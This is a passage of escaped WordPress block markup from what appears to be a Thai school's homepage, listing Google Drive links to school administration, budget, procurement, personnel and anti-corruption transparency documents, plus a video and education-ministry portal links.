data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 